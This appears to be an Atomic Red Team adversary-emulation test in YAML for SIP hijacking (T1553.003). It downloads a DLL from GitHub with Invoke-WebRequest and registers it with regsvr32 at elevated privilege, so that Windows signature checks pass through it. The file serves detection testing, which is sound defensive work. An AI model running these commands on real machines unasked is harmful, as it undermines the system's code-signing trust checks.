pingujwal
32 lines
1.4 KiB
YAML
32 lines
1.4 KiB
YAML
attack_technique: T1553.003
|
|
display_name: 'Subvert Trust Controls: SIP and Trust Provider Hijacking'
|
|
atomic_tests:
|
|
- name: SIP (Subject Interface Package) Hijacking via Custom DLL
|
|
auto_generated_guid: e12f5d8d-574a-4e9d-8a84-c0e8b4a8a675
|
|
description: |
|
|
Registers a DLL that logs signature checks, mimicking SIP hijacking. This test uses a DLL from
|
|
https://github.com/gtworek/PSBits/tree/master/SIP and registers it using regsvr32, thereby causing
|
|
the system to utilize it during signature checks, and logging said checks.
|
|
supported_platforms:
|
|
- windows
|
|
input_arguments:
|
|
dll_payload:
|
|
description: Path to GTSIPProvider.dll
|
|
type: path
|
|
default: PathToAtomicsFolder\T1553.003\bin\GTSIPProvider.dll
|
|
dependency_executor_name: powershell
|
|
dependencies:
|
|
- description: |
|
|
GTSIPProvider.dll must exist on disk at specified location (#{dll_payload})
|
|
prereq_command: |
|
|
if (Test-Path "#{dll_payload}") {exit 0} else {exit 1}
|
|
get_prereq_command: |
|
|
New-Item -Type Directory (split-path "#{dll_payload}") -ErrorAction ignore | Out-Null
|
|
Invoke-WebRequest "https://github.com/gtworek/PSBits/raw/2aa885c7d09f7f100997bfa5ee0c404084177f24/SIP/GTSIPProvider.dll" -OutFile "#{dll_payload}"
|
|
executor:
|
|
command: |
|
|
regsvr32.exe #{dll_payload}
|
|
cleanup_command: |
|
|
regsvr32.exe /u #{dll_payload}
|
|
name: command_prompt
|
|
elevation_required: true |